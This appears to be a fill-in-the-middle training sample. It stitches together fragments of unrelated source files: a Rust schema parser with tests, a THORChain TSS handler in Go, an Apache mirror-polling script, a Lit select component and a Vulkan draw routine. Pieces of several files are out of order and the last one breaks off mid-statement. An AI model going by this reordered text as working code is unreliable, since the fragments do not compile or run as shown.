} } } #[derive(Debug, Deserialize, Eq, PartialEq, Copy, Clone)] pub enum ColumnType { #[serde(alias = "string")] String, #[serde(alias = "i32")] Int32, #[serde(alias = "i64")] Int64, #[serde(alias = "bool")] Bool, #[serde(alias = "f32")] Float, #[serde(alias = "f64")] Double, #[serde(alias = "datetime")] DateTime, } impl Display for ColumnType { fn fmt(&self, f: &mut Formatter<'_>) -> std::fmt::Result { let value = match self { ColumnType::String => "string", ColumnType::Int32 => "i32", ColumnType::Int64 => "i64", ColumnType::Bool => "bool", ColumnType::Float => "f32", ColumnType::Double => "f64", ColumnType::DateTime => "datetime", }; f.write_str(&value) } } #[cfg(test)] mod tests { use super::*; #[test] fn parse_schema() { let raw = " regex: '*' filename: .* table: logs columns: - name: string type: string multiline: true - name: i32 type: i32 - name: i64 type: i64 - name: bool type: bool - name: f32 type: f32 - name: f64 type: f64 - name: datetime type: datetime "; let schema = Schema::try_from(raw).unwrap(); let expected = Schema { regex: "*".to_string(), filename: ".*".to_string(), table: "logs".to_string(), columns: vec![ Column::multiline_string("string"), Column::new("i32", ColumnType::Int32), Column::new("i64", ColumnType::Int64), Column::new("bool", ColumnType::Bool), Column::new("f32", ColumnType::Float), Column::new("f64", ColumnType::Double), Column::new("datetime", ColumnType::DateTime), ], }; assert_eq!(expected, schema); } #[test] fn parse_invalid_multiline()
#[test] fn parse_invalid_multiple_multiline() { let raw = " regex: '*' filename: .* table: logs columns: - name: string1 type: string multiline: true - name: string2 type: string multiline: true "; let schema = Schema::try_from(raw); assert!(schema.is_err()); if let Err(Error::TooManyMultilineColumns(columns)) = schema { assert_eq!( columns, vec![String::from("string1"), String::from("string2")] ); } else { panic!( "Error should be Error::TooManyMultilineColumns. Actual error: {:?}", schema.unwrap_err() ); } } }
{ let cases = [ ("i32", ColumnType::Int32), ("i64", ColumnType::Int64), ("bool", ColumnType::Bool), ("f32", ColumnType::Float), ("f64", ColumnType::Double), ("datetime", ColumnType::DateTime), ]; for case in cases { let raw = format!( " regex: '*' filename: .* table: logs columns: - name: string type: string - name: {} type: {} multiline: true ", case.0, case.0 ); let schema = Schema::try_from(raw.as_str()); assert!(schema.is_err()); if let Err(Error::InvalidMultilineType(name, r#type)) = schema { assert_eq!(case.0.to_owned(), name); assert_eq!(case.1, r#type); } else { panic!( "Error should be Error::InvalidMultilineType. Actual error: {:?}", schema.unwrap_err() ); } } }
handler_tss.go
package thorchain import ( "fmt" "github.com/armon/go-metrics" "github.com/blang/semver" "github.com/cosmos/cosmos-sdk/telemetry" "gitlab.com/thorchain/thornode/common" "gitlab.com/thorchain/thornode/common/cosmos" "gitlab.com/thorchain/thornode/constants" ) // TssHandler handle MsgTssPool type TssHandler struct { mgr Manager } // NewTssHandler create a new handler to process MsgTssPool func NewTssHandler(mgr Manager) TssHandler { return TssHandler{ mgr: mgr, } } // Run is the main entry for TssHandler func (h TssHandler) Run(ctx cosmos.Context, m cosmos.Msg) (*cosmos.Result, error) { msg, ok := m.(*MsgTssPool) if !ok { return nil, errInvalidMessage } err := h.validate(ctx, *msg) if err != nil { ctx.Logger().Error("msg_tss_pool failed validation", "error", err) return nil, err } result, err := h.handle(ctx, *msg) if err != nil { ctx.Logger().Error("failed to process MsgTssPool", "error", err) return nil, err } return result, err } func (h TssHandler) validate(ctx cosmos.Context, msg MsgTssPool) error { version := h.mgr.GetVersion() if version.GTE(semver.MustParse("0.71.0")) { return h.validateV71(ctx, msg) } else if version.GTE(semver.MustParse("0.68.0")) { return h.validateV68(ctx, msg) } else if version.GTE(semver.MustParse("0.1.0")) { return h.validateV1(ctx, msg) } return errBadVersion } func (h TssHandler) validateV71(ctx cosmos.Context, msg MsgTssPool) error { if err := msg.ValidateBasic(); err != nil { return err } newMsg, err := NewMsgTssPool(msg.PubKeys, msg.PoolPubKey, msg.KeygenType, msg.Height, msg.Blame, msg.Chains, msg.Signer, msg.KeygenTime) if err != nil { return fmt.Errorf("fail to recreate MsgTssPool,err: %w", err) } if msg.ID != newMsg.ID { return cosmos.ErrUnknownRequest("invalid tss message") } churnRetryBlocks := h.mgr.GetConstants().GetInt64Value(constants.ChurnRetryInterval) if msg.Height <= common.BlockHeight(ctx)-churnRetryBlocks { return cosmos.ErrUnknownRequest("invalid keygen block") } keygenBlock, err := h.mgr.Keeper().GetKeygenBlock(ctx, msg.Height) if err != nil { return fmt.Errorf("fail to get keygen block from data store: %w", err) } for _, keygen := range keygenBlock.Keygens { keyGenMembers := keygen.GetMembers() if !msg.GetPubKeys().Equals(keyGenMembers) { continue } // Make sure the keygen type are consistent if msg.KeygenType != keygen.Type { continue } for _, member := range keygen.GetMembers() { addr, err := member.GetThorAddress() if err == nil && addr.Equals(msg.Signer) { return h.validateSigner(ctx, msg.Signer) } } } return cosmos.ErrUnauthorized("not authorized") } func (h TssHandler) validateSigner(ctx cosmos.Context, signer cosmos.AccAddress) error { nodeSigner, err := h.mgr.Keeper().GetNodeAccount(ctx, signer) if err != nil { return fmt.Errorf("invalid signer") } if nodeSigner.IsEmpty() { return fmt.Errorf("invalid signer") } if nodeSigner.Status != NodeActive && nodeSigner.Status != NodeReady { return fmt.Errorf("invalid signer status(%s)", nodeSigner.Status) } // ensure we have enough rune minBond, err := h.mgr.Keeper().GetMimir(ctx, constants.MinimumBondInRune.String()) if minBond < 0 || err != nil { minBond = h.mgr.GetConstants().GetInt64Value(constants.MinimumBondInRune) } if nodeSigner.Bond.LT(cosmos.NewUint(uint64(minBond))) { return fmt.Errorf("signer doesn't have enough rune") } return nil } func (h TssHandler) handle(ctx cosmos.Context, msg MsgTssPool) (*cosmos.Result, error) { ctx.Logger().Info("handleMsgTssPool request", "ID:", msg.ID) version := h.mgr.GetVersion() if version.GTE(semver.MustParse("0.73.0")) { return h.handleV73(ctx, msg) } else if version.GTE(semver.MustParse("0.68.0")) { return h.handleV68(ctx, msg) } else if version.GTE(semver.MustParse("0.1.0")) { return h.handleV1(ctx, msg) } return nil, errBadVersion } func (h TssHandler) handleV73(ctx cosmos.Context, msg MsgTssPool) (*cosmos.Result, error) { ctx.Logger().Info("handler tss", "current version", h.mgr.GetVersion()) if !msg.Blame.IsEmpty() { ctx.Logger().Error(msg.Blame.String()) } // only record TSS metric when keygen is success if msg.IsSuccess() && !msg.PoolPubKey.IsEmpty() { metric, err := h.mgr.Keeper().GetTssKeygenMetric(ctx, msg.PoolPubKey) if err != nil { ctx.Logger().Error("fail to get keygen metric", "error", err) } else { ctx.Logger().Info("save keygen metric to db") metric.AddNodeTssTime(msg.Signer, msg.KeygenTime) h.mgr.Keeper().SetTssKeygenMetric(ctx, metric) } } voter, err := h.mgr.Keeper().GetTssVoter(ctx, msg.ID) if err != nil { return nil, fmt.Errorf("fail to get tss voter: %w", err) } // when PoolPubKey is empty , which means TssVoter with id(msg.ID) doesn't // exist before, this is the first time to create it // set the PoolPubKey to the one in msg, there is no reason voter.PubKeys // have anything in it either, thus override it with msg.PubKeys as well if voter.PoolPubKey.IsEmpty() { voter.PoolPubKey = msg.PoolPubKey voter.PubKeys = msg.PubKeys } // voter's pool pubkey is the same as the one in messasge if !voter.PoolPubKey.Equals(msg.PoolPubKey) { return nil, fmt.Errorf("invalid pool pubkey") } observeSlashPoints := h.mgr.GetConstants().GetInt64Value(constants.ObserveSlashPoints) observeFlex := h.mgr.GetConstants().GetInt64Value(constants.ObservationDelayFlexibility) h.mgr.Slasher().IncSlashPoints(ctx, observeSlashPoints, msg.Signer) if !voter.Sign(msg.Signer, msg.Chains) { ctx.Logger().Info("signer already signed MsgTssPool", "signer", msg.Signer.String(), "txid", msg.ID) return &cosmos.Result{}, nil } h.mgr.Keeper().SetTssVoter(ctx, voter) // doesn't have 2/3 majority consensus yet if !voter.HasConsensus() { return &cosmos.Result{}, nil } // when keygen success if msg.IsSuccess() { h.judgeLateSigner(ctx, msg, voter) if !voter.HasCompleteConsensus() { return &cosmos.Result{}, nil } } if voter.BlockHeight == 0 { voter.BlockHeight = common.BlockHeight(ctx) h.mgr.Keeper().SetTssVoter(ctx, voter) h.mgr.Slasher().DecSlashPoints(ctx, observeSlashPoints, voter.GetSigners()...) if msg.IsSuccess() { vaultType := YggdrasilVault
if msg.KeygenType == AsgardKeygen { vaultType = AsgardVault } chains := voter.ConsensusChains() vault := NewVault(common.BlockHeight(ctx), InitVault, vaultType, voter.PoolPubKey, chains.Strings(), h.mgr.Keeper().GetChainContracts(ctx, chains)) vault.Membership = voter.PubKeys if err := h.mgr.Keeper().SetVault(ctx, vault); err != nil { return nil, fmt.Errorf("fail to save vault: %w", err) } keygenBlock, err := h.mgr.Keeper().GetKeygenBlock(ctx, msg.Height) if err != nil { return nil, fmt.Errorf("fail to get keygen block, err: %w, height: %d", err, msg.Height) } initVaults, err := h.mgr.Keeper().GetAsgardVaultsByStatus(ctx, InitVault) if err != nil { return nil, fmt.Errorf("fail to get init vaults: %w", err) } if len(initVaults) == len(keygenBlock.Keygens) { for _, v := range initVaults { v.UpdateStatus(ActiveVault, common.BlockHeight(ctx)) if err := h.mgr.Keeper().SetVault(ctx, v); err != nil { return nil, fmt.Errorf("fail to save vault: %w", err) } if err := h.mgr.VaultMgr().RotateVault(ctx, v); err != nil { return nil, fmt.Errorf("fail to rotate vault: %w", err) } } } else { ctx.Logger().Info("not enough keygen yet", "expecting", len(keygenBlock.Keygens), "current", len(initVaults)) } metric, err := h.mgr.Keeper().GetTssKeygenMetric(ctx, msg.PoolPubKey) if err != nil { ctx.Logger().Error("fail to get keygen metric", "error", err) } else { var total int64 for _, item := range metric.NodeTssTimes { total += item.TssTime } evt := NewEventTssKeygenMetric(metric.PubKey, metric.GetMedianTime()) if err := h.mgr.EventMgr().EmitEvent(ctx, evt); err != nil { ctx.Logger().Error("fail to emit tss metric event", "error", err) } } } else { // if a node fail to join the keygen, thus hold off the network // from churning then it will be slashed accordingly slashPoints := h.mgr.GetConstants().GetInt64Value(constants.FailKeygenSlashPoints) totalSlash := cosmos.ZeroUint() for _, node := range msg.Blame.BlameNodes { nodePubKey, err := common.NewPubKey(node.Pubkey) if err != nil { return nil, ErrInternal(err, fmt.Sprintf("fail to parse pubkey(%s)", node.Pubkey)) } na, err := h.mgr.Keeper().GetNodeAccountByPubKey(ctx, nodePubKey) if err != nil { return nil, fmt.Errorf("fail to get node from it's pub key: %w", err) } if na.Status == NodeActive { if err := h.mgr.Keeper().IncNodeAccountSlashPoints(ctx, na.NodeAddress, slashPoints); err != nil { ctx.Logger().Error("fail to inc slash points", "error", err) } else { telemetry.IncrCounterWithLabels( []string{"thornode", "point_slash"}, float32(slashPoints), []metrics.Label{ telemetry.NewLabel("address", na.NodeAddress.String()), telemetry.NewLabel("reason", "failed_keygen"), }, ) } if err := h.mgr.EventMgr().EmitEvent(ctx, NewEventSlashPoint(na.NodeAddress, slashPoints, "fail keygen")); err != nil { ctx.Logger().Error("fail to emit slash point event") } } else { // go to jail jailTime := h.mgr.GetConstants().GetInt64Value(constants.JailTimeKeygen) releaseHeight := common.BlockHeight(ctx) + jailTime reason := "failed to perform keygen" if err := h.mgr.Keeper().SetNodeAccountJail(ctx, na.NodeAddress, releaseHeight, reason); err != nil { ctx.Logger().Error("fail to set node account jail", "node address", na.NodeAddress, "reason", reason, "error", err) } // take out bond from the node account and add it to vault bond reward RUNE // thus good behaviour node will get reward reserveVault, err := h.mgr.Keeper().GetNetwork(ctx) if err != nil { return nil, fmt.Errorf("fail to get reserve vault: %w", err) } slashBond := reserveVault.CalcNodeRewards(cosmos.NewUint(uint64(slashPoints))) if slashBond.GT(na.Bond) { slashBond = na.Bond } ctx.Logger().Info("fail keygen , slash bond", "address", na.NodeAddress, "amount", slashBond.String()) na.Bond = common.SafeSub(na.Bond, slashBond) totalSlash = totalSlash.Add(slashBond) coin := common.NewCoin(common.RuneNative, slashBond) if !coin.Amount.IsZero() { if err := h.mgr.Keeper().SendFromModuleToModule(ctx, BondName, ReserveName, common.NewCoins(coin)); err != nil { return nil, fmt.Errorf("fail to transfer funds from bond to reserve: %w", err) } } } if err := h.mgr.Keeper().SetNodeAccount(ctx, na); err != nil { return nil, fmt.Errorf("fail to save node account: %w", err) } tx := common.Tx{} tx.ID = common.BlankTxID tx.FromAddress = na.BondAddress bondEvent := NewEventBond(totalSlash, BondCost, tx) if err := h.mgr.EventMgr().EmitEvent(ctx, bondEvent); err != nil { return nil, fmt.Errorf("fail to emit bond event: %w", err) } } } return &cosmos.Result{}, nil } if (voter.BlockHeight + observeFlex) >= common.BlockHeight(ctx) { h.mgr.Slasher().DecSlashPoints(ctx, observeSlashPoints, msg.Signer) } return &cosmos.Result{}, nil } func (h TssHandler) judgeLateSigner(ctx cosmos.Context, msg MsgTssPool, voter TssVoter) { // if the voter doesn't reach 2/3 majority consensus , this method should not take any actions if !voter.HasConsensus() || !msg.IsSuccess() { return } slashPoints := h.mgr.GetConstants().GetInt64Value(constants.FailKeygenSlashPoints) // when voter already has 2/3 majority signers , restore current message signer's slash points if voter.MajorityConsensusBlockHeight > 0 { h.mgr.Slasher().DecSlashPoints(ctx, slashPoints, msg.Signer) if err := h.mgr.Keeper().ReleaseNodeAccountFromJail(ctx, msg.Signer); err != nil { ctx.Logger().Error("fail to release node account from jail", "node address", msg.Signer, "error", err) } return } voter.MajorityConsensusBlockHeight = common.BlockHeight(ctx) h.mgr.Keeper().SetTssVoter(ctx, voter) for _, member := range msg.PubKeys { pkey, err := common.NewPubKey(member) if err != nil { ctx.Logger().Error("fail to get pub key", "error", err) continue } thorAddr, err := pkey.GetThorAddress() if err != nil { ctx.Logger().Error("fail to get thor address", "error", err) continue } // whoever is in the keygen list , but didn't broadcast MsgTssPool if !voter.HasSigned(thorAddr) { h.mgr.Slasher().IncSlashPoints(ctx, slashPoints, thorAddr) // go to jail jailTime := h.mgr.GetConstants().GetInt64Value(constants.JailTimeKeygen) releaseHeight := common.BlockHeight(ctx) + jailTime reason := "failed to vote keygen in time" if err := h.mgr.Keeper().SetNodeAccountJail(ctx, thorAddr, releaseHeight, reason); err != nil { ctx.Logger().Error("fail to set node account jail", "node address", thorAddr, "reason", reason, "error", err) } } } }
models.rs
use serde::{Deserialize, Serialize}; use uuid::Uuid; #[derive(Serialize, Deserialize, Debug)] pub struct Episode { pub uuid: Option<Uuid>, pub title: String, pub episode: i16, pub season: Option<i16>, pub description: String,
}
poll-mirrors.py
#!/usr/bin/env python3 # # vim: softtabstop=2 shiftwidth=2 expandtab # # Python port of poll-mirrors.pl # # This script is designed to poll download sites after posting a release # and print out notice as each becomes available. The RM can use this # script to delay the release announcement until the release can be # downloaded. # # # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import argparse import datetime import ftplib import re import sys import time from urllib.parse import urlparse from multiprocessing import Pool import http.client as http def p(s): sys.stdout.write(s) sys.stdout.flush() def mirror_contains_file(url): url = urlparse(url) if url.scheme == 'https': return https_file_exists(url) elif url.scheme == 'http': return http_file_exists(url) elif url.scheme == 'ftp': return ftp_file_exists(url) def http_file_exists(url): exists = False try: conn = http.HTTPConnection(url.netloc) conn.request('HEAD', url.path) response = conn.getresponse() exists = response.status == 200 except: pass return exists def https_file_exists(url): exists = False try: conn = http.HTTPSConnection(url.netloc) conn.request('HEAD', url.path) response = conn.getresponse() exists = response.status == 200 except: pass return exists def ftp_file_exists(url): listing = [] try: conn = ftplib.FTP(url.netloc) conn.login() listing = conn.nlst(url.path) conn.quit() except Exception as e: pass return len(listing) > 0 def check_mirror(url):
if __name__ == '__main__': desc = 'Periodically checks that all Solr mirrors contain either a copy of a release or a specified path' parser = argparse.ArgumentParser(description=desc) parser.add_argument('-version', '-v', help='Solr Operator version to check') parser.add_argument('-path', '-p', help='instead of a versioned release, check for some/explicit/path') parser.add_argument('-interval', '-i', help='seconds to wait before re-querying mirrors', type=int, default=300) parser.add_argument('-once', '-o', help='run only once', action='store_true', default=False) args = parser.parse_args() if (args.version is None and args.path is None) \ or (args.version is not None and args.path is not None): p('You must specify either -version or -path but not both!\n') sys.exit(1) try: conn = http.HTTPSConnection('www.apache.org') conn.request('GET', '/mirrors/') response = conn.getresponse() html = response.read() except Exception as e: p('Unable to fetch the Apache mirrors list!\n') sys.exit(1) mirror_path = args.path if args.path is not None else 'solr/solr-operator/{}/solr-operator-{}.tgz'.format(args.version, args.version) pending_mirrors = [] for match in re.finditer('<TR>(.*?)</TR>', str(html), re.MULTILINE | re.IGNORECASE | re.DOTALL): row = match.group(1) if not '<TD>ok</TD>' in row: # skip bad mirrors continue match = re.search('<A\s+HREF\s*=\s*"([^"]+)"\s*>', row, re.MULTILINE | re.IGNORECASE) if match: pending_mirrors.append(match.group(1) + mirror_path) total_mirrors = len(pending_mirrors) label = args.version if args.version is not None else args.path while True: p('\n{:%Y-%m-%d %H:%M:%S}'.format(datetime.datetime.now())) p('\nPolling {} Apache Mirrors'.format(len(pending_mirrors))) p('...\n') start = time.time() with Pool(processes=5) as pool: pending_mirrors = list(filter(lambda x: x is not None, pool.map(check_mirror, pending_mirrors))) stop = time.time() remaining = args.interval - (stop - start) available_mirrors = total_mirrors - len(pending_mirrors) p('\n{} is downloadable from {}/{} Apache Mirrors ({:.2f}%)\n' .format(label, available_mirrors, total_mirrors, available_mirrors * 100 / (1 if total_mirrors == 0 else total_mirrors) )) if len(pending_mirrors) == 0 or args.once == True: break if remaining > 0: p('Sleeping for {:d} seconds...\n'.format(int(remaining + 0.5))) time.sleep(remaining)
if mirror_contains_file(url): p('.') return None else: # p('\nFAIL: ' + url + '\n') p('X') return url
flow-select.js
import {BaseElement, html, css, dpc} from './base-element.js'; import {FlowMenu} from './flow-menu.js'; /** * @export * @class FlowSelect * @extends {FlowMenu} * @cssvar {font-family} [--flow-font-family="Julius Sans One"] * @cssvar {font-size} [--flow-select-font-size-label=0.7rem] * @cssvar {font-weight} [--flow-input-font-weight=400] * @cssvar {font-size} [--flow-input-font-size=1rem] * @cssvar {height} [--flow-select-input-height] * @cssvar {line-height} [--flow-input-line-heigh=1.2] * @cssvar {min-height} [--flow-select-selected-min-height=44px] * @cssvar {min-width} [--flow-select-selected-min-width=100px] * @cssvar {max-width} [--flow-select-selected-max-width=500px] * @cssvar {background-color} [--flow-input-bg=inherit] * @cssvar {border} [--flow-select-border-label=2px solid var(--flow-border-color, var(--flow-primary-color, rgba(0,151,115,1)))] * @cssvar {border} [--flow-select-border=2px solid var(--flow-border-color, var(--flow-primary-color, rgba(0,151,115,1)))] * @cssvar {color} [--flow-input-color=inherit] * @cssvar {color} [--flow-input-placeholder=#888] * @cssvar {padding} [--flow-select-padding-label=2px 5px] * @cssvar {padding} [--flow-select-padding=5px] * @cssvar {margin} [--flow-select-filter-input-margin=0px 0px 5px] * @cssvar {color} [--flow-select-trigger-bg=transparent] * @cssvar {color} [--flow-select-trigger-color= var(--flow-color, #000)] * @cssvar {padding} [--flow-select-trigger-padding=0px] * @cssvar {color} [--flow-select-trigger-hover-bg=transparent] * @cssvar {color} [--flow-select-trigger-hover-color=var(--flow-dropdown-trigger-color)] * @cssvar {height} [--flow-select-trigger-line-height=1] * @cssvar {margin} [--flow-select-input-margin=0px] * @example * <flow-select label="menu" selected="0"> * <flow-menu-item value="0">Menu Item 1</flow-menu-item> * <flow-menu-item value="1">Menu Item 2</flow-menu-item> * </flow-select> */ export class
extends FlowMenu { static get properties() { return { label:{type:String}, textAttr:{type:String}, showfilter:{type:Boolean}, filterText:{type:String}, searchIcon:{type:String}, disabled:{type:Boolean, reflect:true}, "right-align":{type:Boolean} } } static get styles() { return [super.styles, css` :host{ display:var(--flow-select-display, inline-block);vertical-align:middle; font-family:var(--flow-font-family, "Julius Sans One"); padding:var(--flow-select-padding, 0px); margin:var(--flow-select-margin, 5px); width:var(--flow-select-width); max-width:var(--flow-select-max-width, 100%); height:var(--flow-select-height); --flow-dropdown-border:var(--flow-select-dropdown-border, 1px solid var(--flow-primary-color, #000)); --flow-dropdown-trigger-bg:var(--flow-select-trigger-bg, transparent); --flow-dropdown-trigger-color:var(--flow-select-trigger-color, var(--flow-color, #000)); --flow-dropdown-trigger-padding:var(--flow-select-trigger-padding, 0px); --flow-dropdown-trigger-hover-bg:var(--flow-select-trigger-hover-bg, transparent); --flow-dropdown-trigger-hover-color:var(--flow-select-trigger-hover-color, var(--flow-dropdown-trigger-color)); --flow-dropdown-trigger-line-height:var(--flow-select-trigger-line-height, 1); --flow-dropdown-top:var(--flow-select-dropdown-border-top, -8px); --flow-dropdown-trigger-font-size:0px; } flow-dropdown{margin:0px;} .wrapper{ display:flex; align-items:stretch; min-width:50px; text-align:center; /*justify-content:center;*/ margin-top:var(--flow-select-wrapper-margin-top,-0.5rem); } label{ /*font-size:0.7rem; padding:2px 5px;*/ font-size:var(--flow-select-label-font-size, 0.7rem); padding:var(--flow-select-label-padding,2px 5px); /*border:2px solid var(--flow-border-color, var(--flow-primary-color, rgba(0,151,115,1)));*/ border: var(--flow-select-label-border, 2px) solid var(--flow-border-color, var(--flow-primary-color, rgba(0,151,115,1))); border-radius:8px; margin-left:var(--flow-select-label-margin-left,10px); z-index:1; position:relative;background-color:var(--flow-input-bg, inherit); font-weight:var(--flow-font-weight, bold); } .input{ flex:1;box-sizing:border-box; /*border:2px solid var(--flow-border-color, var(--flow-primary-color, rgba(0,151,115,1)));*/ border: var(--flow-select-border, 2px) solid var(--flow-border-color, var(--flow-primary-color, rgba(0,151,115,1))); border-radius:var(--flow-select-input-border-radius, var(--flow-input-border-radius, 8px)); margin:var(--flow-select-input-margin, 0px); padding:var(--flow-select-input-padding,16px 30px 10px 10px); background-color:var(--flow-select-input-bg, var(--flow-input-bg, inherit)); color:var(--flow-input-color, inherit); font-size:var(--flow-input-font-size, 1rem); font-weight:var(--flow-input-font-weight, 400); line-height:var(--flow-input-line-height, 1.2); text-align:left; height:var(--flow-select-input-height); width:var(--flow-select-input-width); } .input:focus{outline:none} .input::-webkit-input-placeholder { color: var(--flow-input-placeholder, #888 ); } .selected{ min-width:var(--flow-select-selected-min-width, 100px); max-width:var(--flow-select-selected-max-width, 500px); min-height:var(--flow-select-selected-min-height, 44px); position:relative; box-shadow:var(--flow-input-box-shadow); height:var(--flow-select-selected-height); width:var(--flow-select-selected-width); overflow: hidden; text-overflow: ellipsis; } :host(:not([disabled])) .input.selected::after{ content:"";display:inline-block; position:absolute;right:10px; top:var(--flow-select-dropdown-arrow, calc(50% - 2px)); width:0px;height:0px; border:5px solid var(--flow-primary-color, #000); border-left-color:transparent; border-bottom-color:transparent; border-right-color:transparent; } flow-dropdown:not([multiple]) .input.selected{white-space:nowrap} .filter{ padding-top:10px;border-radius:3px; } .filter-box{ position:relative;display:flex;align-items:center; margin:var(--flow-select-filter-input-margin, 0px 0px 5px); } .filter-box[hidden]{display:none} .filter-box .clear-btn{ position:absolute;right:10px;cursor:pointer;display:none; font-size:1.5rem;color:var(--flow-input-color, inherit); } .filter-box input[has-content]+.clear-btn{display:inline-block} .filter-box input{ padding-left:30px; } .filter-box .icon{ width:15px;height:15px;fill:var(--flow-primary-color); position:absolute;left:10px; } .dd ::slotted([flow-select-filtred]){display:none} `]; } constructor(){ super(); this.textAttr = "data-text"; } render() { let iconSrc = this.iconPath(this.searchIcon || "search"); return html `<flow-dropdown ?multiple="${this.multiple}" ?disabled=${this.disabled} ?right-align=${this["right-align"]}> <div slot="trigger"> <label ?hidden=${!this.label}>${this.label||""}</label> <div class="wrapper" @click=${this.onClick}> <slot name="prefix"></slot> <div class="input selected"> ${this.renderSelected()}&nbsp; </div> <slot name="sufix"></slot> </div> </div><div class="dd"> <div class="filter-box" ?hidden=${!this.showfilter}> <svg class="icon"> <use href="${iconSrc}"></use> </svg> <input class="input filter" type="text" placeholder="${this.placeholder || 'Search...'}" ?has-content=${this.filterText} .value="${this.filterText||''}" @keyup=${this.onSearch} /> <a class="clear-btn" @click=${this.clearFilter}>&times;</a> </div> <div class="menu-list-container"> <slot class="menu-list"></slot> ${this.renderItems()} </div> </div> </flow-dropdown>`; } renderItems(){ return ''; } renderSelected(){ let map = new Map(); this.list.forEach(item=>{ let text = item.getAttribute(this.textAttr) || item.innerText; map.set(item.getAttribute(this.valueAttr), text) }) return this._selected.map(s=>html `<span class="item" value="${s}">${map.get(s) || s}</span>` ) } selectionChanged(){ super.selectionChanged(); if(!this.multiple && this.dropdown) this.dropdown.close(); } firstUpdated(){ super.firstUpdated(); if(this.classList.contains("right-align")) this["right-align"] = true; this.dropdown = this.renderRoot.querySelector("flow-dropdown"); let slot = this.renderRoot.querySelector('slot.menu-list'); this.listSlot = slot; slot.addEventListener('slotchange', (e)=>{ this.updateList(); }); this.parseSelected(); this.requestUpdate("_selected", []) } updateList(changes){ super.updateList(); if(!changes) this.requestUpdate("_selected", this._selected.slice(0)) } clearFilter(){ this.filterText = ""; this.filterList(""); } onSearch(e){ let text = e.target.value; this.filterText = text; this.debounce('onSearch', ()=>{ this.filterList(text); }, 200) } filterList(text){ const rg = new RegExp(`${text}`, 'i'); console.log("this.list", this.list); this.list.forEach(item=>{ let text = item.getAttribute(this.textAttr) || item.innerText; let value = item.getAttribute(this.valueAttr); if(!text || rg.test(value) || rg.test(text)){ item.removeAttribute('flow-select-filtred') }else{ item.setAttribute('flow-select-filtred', true) } }) } /* onWindowResize(){ this.updateDropdownSize(); } onParentScroll(){ this.updateDropdownSize(); } connectedCallback(){ super.connectedCallback(); } disconnectedCallback(){ super.disconnectedCallback(); } */ } FlowSelect.define('flow-select');
FlowSelect
draw.rs
use crate::utils; use ash::extensions::khr; use ash::version::DeviceV1_0; use ash::vk; pub fn
( device: &ash::Device, swapchain: vk::SwapchainKHR, queue: vk::Queue, active_resource_index: u32, command_pool: vk::CommandPool, active_command_buffers: &mut Vec<vk::CommandBuffer>, pipeline: vk::Pipeline, pipeline_layout: vk::PipelineLayout, pos_uv_desc_set: vk::DescriptorSet, render_pass: vk::RenderPass, framebuffers: &Vec<vk::Framebuffer>, surface_extent: vk::Extent2D, image_available_semaphore: vk::Semaphore, rendering_complete_semaphore: vk::Semaphore, fences: &Vec<vk::Fence>, swapchain_loader: &khr::Swapchain, scale: i32, ) -> Result<(), String> { let (image_index, _) = match unsafe { swapchain_loader.acquire_next_image( swapchain, u64::MAX, image_available_semaphore, vk::Fence::null(), ) } { Ok(index) => index, Err(_) => return Err(String::from("failed to acquire next image")), }; unsafe { let graphics_fence = fences[active_resource_index as usize]; let fences = [graphics_fence]; match device.wait_for_fences(&fences, true, u64::MAX) { Err(_) => { return Err(format!( "failed to wait for graphics fence {}", active_resource_index )) } _ => (), } let fences = [graphics_fence]; match device.reset_fences(&fences) { Err(_) => { return Err(format!( "failed to reset graphics fence {}", active_resource_index )) } _ => (), } { let command_buffer = active_command_buffers[active_resource_index as usize]; let buffers = [command_buffer]; device.free_command_buffers(command_pool, &buffers); let allocate_info = vk::CommandBufferAllocateInfo::builder() .command_pool(command_pool) .level(vk::CommandBufferLevel::PRIMARY) .command_buffer_count(1); let command_buffers = match device.allocate_command_buffers(&allocate_info) { Ok(buf) => buf, Err(_) => { return Err(format!( "failed to allocate command buffer fot active resource index {}", active_resource_index )) } }; active_command_buffers[active_resource_index as usize] = command_buffers[0]; } let command_buffer = active_command_buffers[active_resource_index as usize]; let begin_info = vk::CommandBufferBeginInfo::builder() .flags(vk::CommandBufferUsageFlags::ONE_TIME_SUBMIT); match device.begin_command_buffer(command_buffer, &begin_info) { Err(_) => return Err(String::from("failed to begin graphics command buffer")), _ => (), } let clear_color = vk::ClearColorValue { float32: [0.5f32, 0.1f32, 0.1f32, 0.1f32], }; let clear_values = vec![vk::ClearValue { color: clear_color }]; let render_pass_begin_info = vk::RenderPassBeginInfo::builder() .render_pass(render_pass) .framebuffer(framebuffers[image_index as usize]) .render_area(vk::Rect2D { offset: vk::Offset2D { x: 0, y: 0 }, extent: surface_extent, }) .clear_values(&clear_values); device.cmd_begin_render_pass( command_buffer, &render_pass_begin_info, vk::SubpassContents::INLINE, ); let mut proj_matrix = utils::get_ortho_projection_matrix( 0.0, surface_extent.width as f32, 0.0, surface_extent.height as f32, 0.0, 1.0, ); proj_matrix[0] *= (scale as f32) * 0.1; proj_matrix[5] *= (scale as f32) * 0.1; let proj_matrix_raw = utils::f32_to_u8(&proj_matrix); device.cmd_push_constants( command_buffer, pipeline_layout, vk::ShaderStageFlags::VERTEX, 0, proj_matrix_raw, ); let viewport = vk::Viewport { x: 0.0f32, y: 0.0f32, width: surface_extent.width as f32, height: surface_extent.height as f32, min_depth: 0.0f32, max_depth: 1.0f32, }; device.cmd_set_viewport(command_buffer, 0, &[viewport]); let scissor = vk::Rect2D { offset: vk::Offset2D { x: 0, y: 0 }, extent: vk::Extent2D { width: surface_extent.width, height: surface_extent.height, }, }; device.cmd_set_scissor(command_buffer, 0, &[scissor]); device.cmd_bind_descriptor_sets( command_buffer, vk::PipelineBindPoint::GRAPHICS, pipeline_layout, 0, &[pos_uv_desc_set], &[], ); device.cmd_bind_pipeline(command_buffer, vk::PipelineBindPoint::GRAPHICS, pipeline); device.cmd_draw(command_buffer, 78, 1, 0, 0); device.cmd_end_render_pass(command_buffer); match device.end_command_buffer(command_buffer) { Err(_) => { return Err(format!( "failed to end command buffer fot active resource index {}", active_resource_index )) } _ => (), } let wait_semaphores = [image_available_semaphore]; let masks = 